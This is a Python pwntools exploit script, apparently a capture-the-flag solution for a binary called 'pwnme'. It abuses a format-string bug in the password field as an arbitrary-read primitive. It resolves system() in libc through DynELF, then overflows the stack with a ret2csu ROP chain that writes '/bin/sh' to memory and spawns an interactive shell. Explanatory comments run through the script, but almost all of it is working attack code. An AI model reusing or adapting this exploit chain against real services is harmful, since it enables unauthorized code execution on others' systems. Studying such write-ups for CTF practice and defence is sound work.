| from pwn import*
#p=remote('106.75.2.53', 10006)
# Run the challenge binary locally; `p` is the tube every later stage talks to.
p = process(['./pwnme'])
def leak(addr):
    """DynELF read primitive: return the bytes stored at *addr* in the target.

    The program evidently hands the stored password to printf() as the format
    string (a format-string vulnerability), so a '%12$s' conversion followed by
    the raw address makes printf dereference the 12th "argument" -- our
    address -- and echo the C string found there.  'BIRDGO!' is a marker that
    lets the echoed bytes be cut out of the response.  A 12-byte response means
    nothing was printed (the byte at *addr* is 0), which is reported as a
    single NUL, the convention DynELF expects.
    """
    marker = 'BIRDGO!'
    # Menu option 2: set a new username/password; the format string goes in
    # the password field.  send(), not sendline(): the packed address must not
    # be followed by a newline.
    p.recvuntil('>')
    p.sendline('2')
    p.recvuntil('please input new username(max lenth:20): \n')
    p.sendline('aaaa')
    p.recvuntil('please input new password(max lenth:20): \n')
    p.send('%12$s' + marker + p64(addr))
    # Menu option 1: print the stored credentials, which triggers the format string.
    p.recvuntil('>')
    p.sendline('1')
    echoed = p.recvuntil(marker)
    if len(echoed) != 12:
        # Drop the 5-byte prefix before the leaked bytes and the trailing marker.
        return echoed[5:-len(marker)]
    return '\x00'
# --- leak the address of system() ---
# Log in once; everything after this is the menu loop that leak() drives.
p.recvuntil('Input your username(max lenth:40): \n')
p.sendline('A')
p.recvuntil('Input your password(max lenth:40): \n')
p.sendline('1')
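# Resolve system() in the remote libc: DynELF walks the link map using leak()
# as its arbitrary-read primitive, so no libc copy or version guess is needed.
d = DynELF(leak, elf=ELF('./pwnme'))
system_addr = d.lookup('system', 'libc')
log.info('system_addr:%#x'%system_addr)

# Menu option 2 once more; this time the password input carries the overflow.
p.recvuntil('>')
p.sendline('2')
p.recvuntil('please input new username(max lenth:20): \n')
p.sendline('cccc')
p.recvuntil('please input new password(max lenth:20): \n')

# Fixed addresses taken from the binary (the 0x40xxxx range implies it is not
# position-independent).  Names follow the author's: pppppr = five pops + ret
# and init_addr = the register-moving/call gadget, both from __libc_csu_init()
# (ret2csu) -- verify the exact pop order against the disassembly.
pppppr = 0x0000000000400ecb
pop_rdi_ret = 0x0000000000400ed3
init_addr = 0x400EB0
binsh_addr = 0x0000000000602000   # writable memory that will receive "/bin/sh"
read_got = 0x0000000000601FC8     # GOT slot of read(); called indirectly by the csu gadget

# 0x28 bytes of filler before the saved return address (presumably the distance
# from the password buffer -- confirm against the binary).
payload = 'a' * 0x28
# Stage 1 (ret2csu): pop rbp=1, r12=read@got, r13=8, r14=binsh_addr, r15=0,
# then jump to the csu call gadget, which presumably does mov rdx,r13;
# mov rsi,r14; mov edi,r15d; call [r12+rbx*8] -> read(0, binsh_addr, 8).
# The original wrote these two notes with '//', which is floor division in
# Python and made the whole script fail to compile.
payload += p64(pppppr) + p64(1) + p64(read_got) + p64(0x8) + p64(binsh_addr) + p64(0)
# Why 7 junk qwords (the author's open question): after the call returns, the
# standard csu gadget executes add rsp,8 and then pops rbx, rbp, r12, r13,
# r14, r15 before its ret -- 1 + 6 = 7 stack slots to skip.  Confirm against
# the disassembly if the binary's __libc_csu_init differs from the usual one.
payload += p64(init_addr) + p64(0) * 7
# Stage 2: system("/bin/sh") with rdi pointing at the string read() just stored.
payload += p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
# Pad to the length the program's input read presumably expects -- confirm.
payload = payload.ljust(0x101, 'a')

p.sendline(payload)
# Consumed by the read(0, binsh_addr, 8) set up in stage 1.
p.sendline('/bin/sh\x00')

p.interactive()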